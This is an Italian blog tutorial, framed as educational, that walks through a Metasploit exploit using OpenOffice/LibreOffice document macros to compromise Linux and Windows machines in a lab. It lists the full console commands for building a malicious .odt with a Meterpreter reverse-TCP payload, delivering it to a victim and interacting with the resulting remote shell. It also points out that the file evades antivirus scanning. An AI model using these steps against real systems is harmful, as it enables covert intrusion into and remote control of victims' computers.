fbpx

Hacking Windows e Linux sfruttando le macro di OpenOffice con Metasploit

N.B.: Tutte le informazioni contenute nel seguente articolo sono a scopo esclusivamente didattico, pertanto l’autore non si riterrà responsabile dell’abuso di tali informazioni da parte degli utenti del sito, qualora esse venissero utilizzate per scopi illegali.

In questo articolo presento l’ennesimo modulo di Metasploit. La particolarità di questo exploit è che, oltre ad essere relativamente recente, può essere utilizzato sia per attaccare una vittima Windows (anche Windows 10), sia contro un PC Linux, il che lo rende molto versatile. Sfrutta una vulnerabilità di OpenOffice e funziona anche con LibreOffice, le due suite di programmi open source da utilizzare come alternative al celebre Office di Microsoft. Nello specifico l’exploit in questione apre una connessione con la macchina attaccante grazie alle macro,  procedure, ovvero insiemi di istruzioni, che servono per automatizzare una serie di azioni all’apertura di un file.

Ambiente di test

  • Attacker: Kali Linux Rolling con indirizzo IP su LAN 192.168.1.5
  • Vittima Linux: Debian 8 Jessie su VMWare Workstation Player
  • Vittima Windows: Windows 7 Service Pack 1 su VMWare Workstation Player

Sembra scontato, ma affinché riusciamo ad utilizzare con successo questo exploit, è necessario che le vittime abbiano abilitato l’esecuzione delle macro su OpenOffice o LibreOffice.

Avviamo il database postgresql e msfconsole

  1. service postgresql start
  2. msfconsole

e cambiamo il contesto di Metasploit per utilizzare l’exploit dedicato alle macro di OpenOffice

  1. use exploit/multi/misc/openoffice_document_macro

Hacking Windows e Linux con OpenOffice Macro e Metasploit

Hacking Linux

Iniziamo prendendo il controllo del PC Linux con Debian Jessie. Di default Debian viene distribuito con LibreOffice installato: non c’è problema l’exploit funzionerà anche su questo software.

Configuriamo l’exploit come segue, utilizzando come payload un reverse tcp in python, e lo lanciamo

  1. set SRVHOST [indirizzo_ip_attacker]
  2. set FILENAME [nome_file.odt]
  3. set TARGET 1
  4. set PAYLOAD python/meterpreter/reverse_tcp
  5. set LHOST [indirizzo_ip_attacker]
  6. run

Hacking Windows e Linux con OpenOffice Macro e Metasploit

Metasploit si occupa di creare il file odt contenente le macro malevole, avviare il server per la consegna del payload e il listener sulla macchina attaccante.

 

Trasferiamo il file odt sulla vittima

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

e lo apriamo consentendo all’attacker la consegna e l’esecuzione del payload

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

digitando il comando jobs vediamo l’exploit, mentre con il comando sessions -l possiamo vedere la sessione attiva

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

iniziamo l’interazione con la sessione di Meterpreter con il comando sessions -i [numero_sessione], infine il comando sysinfo ci conferma la riuscita del procedimento

Hacking Windows e Linux con OpenOffice Macro e Metasploit

Hacking Windows

Il procedimento è molto simile al precedente, fatta eccezione per il payload. Sebbene io l’abbia testata su Windows 7, dovrebbe funzionare senza intoppi anche su Windows 10.

Ripartiamo configurando e lanciando l’exploit

  1. set SRVHOST [indirizzo_ip_attacker]
  2. set FILENAME [nome_file.odt]
  3. set PAYLOAD windows/meterpreter/reverse_tcp
  4. set LHOST [indirizzo_ip_attacker]
  5. run

Non avendo specificato il TARGET, l’exploit lo imposta automaticamente su Windows, quello di default

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

Trasferiamo il file sulla vittima

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

Questo exploit su Windows risulta particolarmente efficace, perché anche se scansioniamo il file con un buon software antivirus, non viene rilevata nessuna minaccia, insomma il file viene considerato sicuro

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

Apriamo il file sulla vittima e ancora una volta elenchiamo le sessioni attive, iniziamo l’interazione con la sessione di Meterpreter e ci accertiamo che tutto funzioni correttamente

  1. sessions -l
  2. sessions -i [numero_sessione]
  3. sysinfo

Hacking Windows e Linux con OpenOffice Macro e Metasploit

Grazie a Baty’s Base per l’Articolo!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *